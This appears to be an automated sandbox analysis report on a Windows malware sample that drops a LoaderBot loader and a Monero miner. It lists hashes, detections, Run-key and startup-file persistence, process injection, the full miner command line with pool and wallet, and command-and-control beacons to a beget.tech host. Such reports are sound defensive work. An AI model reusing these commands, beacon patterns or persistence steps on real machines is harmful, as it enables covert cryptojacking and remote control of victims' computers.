Analysis
-
max time kernel
157s -
max time network
164s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
29/04/2022, 15:41 UTC
Static task
static1
Behavioral task
behavioral1
Sample
yhrtfweadqwa.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
yhrtfweadqwa.exe
Resource
win10v2004-20220414-en
General
-
Target
yhrtfweadqwa.exe
-
Size
4.0MB
-
MD5
9e5ab0afc9796bbed8ca5a2f683aae01
-
SHA1
7063aaa1901e0ae659c32d33b866684d8282b0d7
-
SHA256
648e092b2cea4d5640f151203911536056abcb6a16d0de391528e9bd8842b940
-
SHA512
7e00d93ad0b2c54e2a6a86eec37bf654c580ecd68804fa3275fe3072db8eb9ecdcf06c4e01ac74907a631427a418c3a4160625c659fa5615c9ef47052a3dbf30
Malware Config
Signatures
-
suricata: ET MALWARE CerberTear Ransomware CnC Checkin
suricata: ET MALWARE CerberTear Ransomware CnC Checkin
-
LoaderBot executable 3 IoCs
resource yara_rule behavioral2/files/0x00070000000231d5-131.dat loaderbot behavioral2/files/0x00070000000231d5-132.dat loaderbot behavioral2/memory/2848-133-0x0000000000460000-0x0000000000860000-memory.dmp loaderbot -
Executes dropped EXE 3 IoCs
pid Process 2848 memory_inject.exe 1628 Driver.exe 4340 Driver.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation yhrtfweadqwa.exe Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation memory_inject.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url memory_inject.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\memory_inject.exe" memory_inject.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 2412 1628 WerFault.exe 84 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe 2848 memory_inject.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 664 Process not Found -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2848 memory_inject.exe Token: SeLockMemoryPrivilege 1628 Driver.exe Token: SeLockMemoryPrivilege 1628 Driver.exe Token: SeLockMemoryPrivilege 4340 Driver.exe Token: SeLockMemoryPrivilege 4340 Driver.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 2652 wrote to memory of 2848 2652 yhrtfweadqwa.exe 83 PID 2652 wrote to memory of 2848 2652 yhrtfweadqwa.exe 83 PID 2652 wrote to memory of 2848 2652 yhrtfweadqwa.exe 83 PID 2848 wrote to memory of 1628 2848 memory_inject.exe 84 PID 2848 wrote to memory of 1628 2848 memory_inject.exe 84 PID 2848 wrote to memory of 4340 2848 memory_inject.exe 89 PID 2848 wrote to memory of 4340 2848 memory_inject.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\yhrtfweadqwa.exe"C:\Users\Admin\AppData\Local\Temp\yhrtfweadqwa.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Users\Public\Videos\memory_inject.exe"C:\Users\Public\Videos\memory_inject.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 45XQiu9A9vmVd5Cy6X35M12NocUr2Hx69X4ZNNu2BsKJYkdksefg2gXJyvBUeEJyDWTfLD6GWmAu4Tab1w4tycfcFMqy8yH -p x -k -v=0 --donate-level=1 -t 13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1628 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1628 -s 7644⤵
- Program crash
PID:2412
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 45XQiu9A9vmVd5Cy6X35M12NocUr2Hx69X4ZNNu2BsKJYkdksefg2gXJyvBUeEJyDWTfLD6GWmAu4Tab1w4tycfcFMqy8yH -p x -k -v=0 --donate-level=1 -t 13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4340
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 460 -p 1628 -ip 16281⤵PID:1096
Network
-
Remote address:13.107.21.200:443RequestGET /manifest/threshold.appcache HTTP/1.1
Accept: */*
Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
Origin: https://www.bing.com
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.2.19041; 10.0.0.0.19041.1288) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Host: www.bing.com
Connection: Keep-Alive
Cookie: SRCHUID=V=2&GUID=9CC9F79AE5A64831AA8CE66EAAC74944&dmnchg=1; SRCHD=AF=NOFORM; SUID=M; SRCHUSR=DOB=20220414; SRCHHPGUSR=SRCHLANG=en&LUT=1649984064722&IPMH=532f3cd9&IPMID=1649985998964; CortanaAppUID=7CD8473CB7C88EB5F6C2E41FC990803D; MUID=246F28A4DF47460497838A5CBF65C8B6; _SS=CPID=1649987670823&AC=1&CPH=035e8e23; MUIDB=246F28A4DF47460497838A5CBF65C8B6
ResponseHTTP/1.1 200 OK
Content-Length: 933
Content-Type: text/cache-manifest; charset=utf-8
Content-Encoding: br
Vary: Accept-Encoding
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Set-Cookie: _EDGE_S=SID=2DF3E26EB93F6A6908C3F3FBB8CA6B44; domain=.bing.com; path=/; HttpOnly
Set-Cookie: MUIDB=246F28A4DF47460497838A5CBF65C8B6; expires=Wed, 24-May-2023 15:41:47 GMT; path=/; HttpOnly
Set-Cookie: _SS=SID=2DF3E26EB93F6A6908C3F3FBB8CA6B44; domain=.bing.com; path=/; secure; SameSite=None
Set-Cookie: SRCHHPGUSR=SRCHLANG=en&LUT=1649984064722&IPMH=76ca0aae&IPMID=1649987670823; domain=.bing.com; expires=Wed, 24-May-2023 15:41:47 GMT; path=/; secure; SameSite=None
X-SNR-Routing: 1
X-XSS-Protection: 0
X-Cache: CONFIG_NOCACHE
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: DE60EB1B6B324D5A851D95D0E936FC2D Ref B: AMBEDGE0809 Ref C: 2022-04-29T15:41:47Z
Date: Fri, 29 Apr 2022 15:41:46 GMT
-
Remote address:13.107.21.200:443RequestGET /AS/API/WindowsCortanaPane/V2/Init HTTP/1.1
Accept: */*
Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.2.19041; 10.0.0.0.19041.1288) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Host: www.bing.com
Connection: Keep-Alive
Cookie: SRCHUID=V=2&GUID=9CC9F79AE5A64831AA8CE66EAAC74944&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20220414; SRCHHPGUSR=SRCHLANG=en&LUT=1649984064722&IPMH=76ca0aae&IPMID=1649987670823; CortanaAppUID=7CD8473CB7C88EB5F6C2E41FC990803D; MUID=246F28A4DF47460497838A5CBF65C8B6; _SS=SID=2DF3E26EB93F6A6908C3F3FBB8CA6B44; _EDGE_S=SID=2DF3E26EB93F6A6908C3F3FBB8CA6B44; MUIDB=246F28A4DF47460497838A5CBF65C8B6
ResponseHTTP/1.1 200 OK
Content-Length: 72023
Content-Type: text/html; charset=utf-8
Content-Encoding: br
Vary: Accept-Encoding
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Set-Cookie: SUID=M; domain=.bing.com; expires=Sat, 30-Apr-2022 15:41:47 GMT; path=/; secure; HttpOnly; SameSite=None
Set-Cookie: MUIDB=246F28A4DF47460497838A5CBF65C8B6; expires=Wed, 24-May-2023 15:41:47 GMT; path=/; HttpOnly
X-SNR-Routing: 1
X-XSS-Protection: 0
X-UA-Compatible: IE=edge
X-Cache: CONFIG_NOCACHE
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: 5EA777C8DFD64B7D8D2B40AA6011414C Ref B: AMBEDGE0809 Ref C: 2022-04-29T15:41:47Z
Date: Fri, 29 Apr 2022 15:41:46 GMT
-
Remote address:8.8.8.8:53Requestxxx01xzb.beget.techIN AResponsexxx01xzb.beget.techIN A91.106.207.25
-
Remote address:91.106.207.25:80RequestGET /cmd.php?hwid=E27E20AC HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: xxx01xzb.beget.tech
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Fri, 29 Apr 2022 15:41:50 GMT
Content-Type: text/html
Content-Length: 3
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
-
Remote address:91.106.207.25:80RequestGET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: xxx01xzb.beget.tech
ResponseHTTP/1.1 200 OK
Date: Fri, 29 Apr 2022 15:41:50 GMT
Content-Type: text/html
Content-Length: 4
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
-
Remote address:91.106.207.25:80RequestGET /cmd.php?hwid=E27E20AC HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: xxx01xzb.beget.tech
ResponseHTTP/1.1 200 OK
Date: Fri, 29 Apr 2022 15:42:50 GMT
Content-Type: text/html
Content-Length: 3
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
-
Remote address:91.106.207.25:80RequestGET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: xxx01xzb.beget.tech
ResponseHTTP/1.1 200 OK
Date: Fri, 29 Apr 2022 15:42:50 GMT
Content-Type: text/html
Content-Length: 4
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
-
Remote address:91.106.207.25:80RequestGET /cmd.php?hwid=E27E20AC HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: xxx01xzb.beget.tech
ResponseHTTP/1.1 200 OK
Date: Fri, 29 Apr 2022 15:43:50 GMT
Content-Type: text/html
Content-Length: 3
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
-
Remote address:91.106.207.25:80RequestGET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: xxx01xzb.beget.tech
ResponseHTTP/1.1 200 OK
Date: Fri, 29 Apr 2022 15:43:50 GMT
Content-Type: text/html
Content-Length: 4
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
-
Remote address:8.8.8.8:53Requestpool.supportxmr.comIN AResponsepool.supportxmr.comIN CNAMEpool-fr.supportxmr.compool-fr.supportxmr.comIN A37.187.95.110pool-fr.supportxmr.comIN A91.121.140.167pool-fr.supportxmr.comIN A94.23.23.52pool-fr.supportxmr.comIN A94.23.247.226pool-fr.supportxmr.comIN A149.202.83.171
-
791 B 7.8kB 11 11
-
5.5kB 86.7kB 77 77
HTTP Request
GET https://www.bing.com/manifest/threshold.appcacheHTTP Response
200HTTP Request
GET https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitHTTP Response
200 -
1.4kB 1.8kB 11 13
HTTP Request
GET http://xxx01xzb.beget.tech/cmd.php?hwid=E27E20ACHTTP Response
200HTTP Request
GET http://xxx01xzb.beget.tech/cmd.php?timeout=1HTTP Response
200HTTP Request
GET http://xxx01xzb.beget.tech/cmd.php?hwid=E27E20ACHTTP Response
200HTTP Request
GET http://xxx01xzb.beget.tech/cmd.php?timeout=1HTTP Response
200HTTP Request
GET http://xxx01xzb.beget.tech/cmd.php?hwid=E27E20ACHTTP Response
200HTTP Request
GET http://xxx01xzb.beget.tech/cmd.php?timeout=1HTTP Response
200 -
1.1kB 845 B 8 5
-
322 B 7
-
322 B 7
-
322 B 7
-
65 B 81 B 1 1
DNS Request
xxx01xzb.beget.tech
DNS Response
91.106.207.25
-
65 B 167 B 1 1
DNS Request
pool.supportxmr.com
DNS Response
37.187.95.11091.121.140.16794.23.23.5294.23.247.226149.202.83.171
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
4.0MB
MD55c7bc4cc56f6e6acb801210bc6eda798
SHA1541b6f50091fdc17c2bc8d596c0e202b854fb991
SHA25648f66e13c00038bb2ec12a58bd34cb79f2cf616230c25224c68b81d6c3d7ebf9
SHA51266558bf8679c264c507a1fb8da2fd81347b339d3786487895f902330d63bf9b44be5a136061b0848801b768fea3e525b934d1b04c2cef959cc878b421c6cbd5d
-
Filesize
4.0MB
MD55c7bc4cc56f6e6acb801210bc6eda798
SHA1541b6f50091fdc17c2bc8d596c0e202b854fb991
SHA25648f66e13c00038bb2ec12a58bd34cb79f2cf616230c25224c68b81d6c3d7ebf9
SHA51266558bf8679c264c507a1fb8da2fd81347b339d3786487895f902330d63bf9b44be5a136061b0848801b768fea3e525b934d1b04c2cef959cc878b421c6cbd5d